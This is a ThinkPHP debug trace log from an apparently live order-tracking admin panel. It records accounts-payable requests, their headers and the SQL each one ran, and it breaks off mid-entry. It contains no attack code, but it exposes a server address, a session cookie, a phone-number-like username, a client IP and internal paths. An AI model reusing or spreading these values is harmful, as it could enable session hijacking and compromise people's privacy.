2022-07-20T17:46:17+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/add?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1 [运行时间:0.076663s][吞吐率:13.04req/s] [内存消耗:5,473.24kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.003379s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'add', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '224', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'row' => array ( 'subject_type' => '1', 'suppliercustomer_id' => '83', 'worker_id' => '', 'explain' => '氧化1205', 'money' => '7832.5', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001591s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->add[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008638s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000483s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001495s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000515s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001588s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001524s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001672s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000620s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001641s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountspayable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.000665s ] [ sql ] [ SQL ] INSERT INTO `ot_accountspayable` (`subject_type` , `suppliercustomer_id` , `worker_id` , `explain` , `money` , `factorymge_id` , `year` , `month` , `day` , `createtime` , `updatetime` , `yu_money`) VALUES (1 , 83 , 0 , '氧化1205' , 7832.5 , 40 , 2022 , 7 , 20 , 1658310377 , 1658310377 , 698570.31) [ RunTime:0.004771s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001574s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 应付账款 添加' , '{\"dialog\":\"1\",\"row\":{\"subject_type\":\"1\",\"suppliercustomer_id\":\"83\",\"worker_id\":\"\",\"explain\":\"\\u6c27\\u53161205\",\"money\":\"7832.5\"}}' , '/admin/financial/accountspayable/add?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658310377) [ RunTime:0.005574s ] --------------------------------------------------------------- [ 2022-07-20T17:46:17+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1658308318507 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1658308318507 [运行时间:0.084225s][吞吐率:11.87req/s] [内存消耗:5,683.31kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001154s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"subject_type":"0"}', 'op' => '{"subject_type":"LIKE"}', '_' => '1658308318507', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001646s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000128s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000537s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001451s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000448s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001297s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001307s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001698s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000432s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001563s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001493s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001383s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001528s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.004478s ] --------------------------------------------------------------- [ 2022-07-20T17:46:22+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1 [运行时间:0.054063s][吞吐率:18.50req/s] [内存消耗:5,261.61kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001133s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002061s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/choosecustom.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000124s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000568s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001467s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000570s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001255s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001360s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001636s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000439s ] --------------------------------------------------------------- [ 2022-07-20T17:46:23+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658310382 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658310382 [运行时间:0.032756s][吞吐率:30.53req/s] [内存消耗:3,854.64kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001094s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658310382', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001512s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000128s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:46:24+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/getTotal [ info ] 47.105.33.115:8081/admin/financial/accountspayable/getTotal [运行时间:0.073184s][吞吐率:13.66req/s] [内存消耗:5,438.78kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000058s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001500s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'getTotal', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '33', 'accept' => '*/*', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'suppliercustomername' => '', 'workername' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001736s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->getTotal[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.009019s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000523s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001567s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000416s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001587s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001399s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001238s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.002033s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.paid_money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.002064s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001573s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"suppliercustomername\":\"\",\"workername\":\"\"}' , '/admin/financial/accountspayable/getTotal' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658310383) [ RunTime:0.006153s ] --------------------------------------------------------------- [ 2022-07-20T17:46:24+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1658310382832 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1658310382832 [运行时间:0.122824s][吞吐率:8.14req/s] [内存消耗:5,683.37kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001741s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{}', 'op' => '{}', '_' => '1658310382832', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002522s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000118s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000521s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001466s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000773s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001266s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001322s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001907s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000659s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001675s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001074s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001409s ] [ sql ] [ 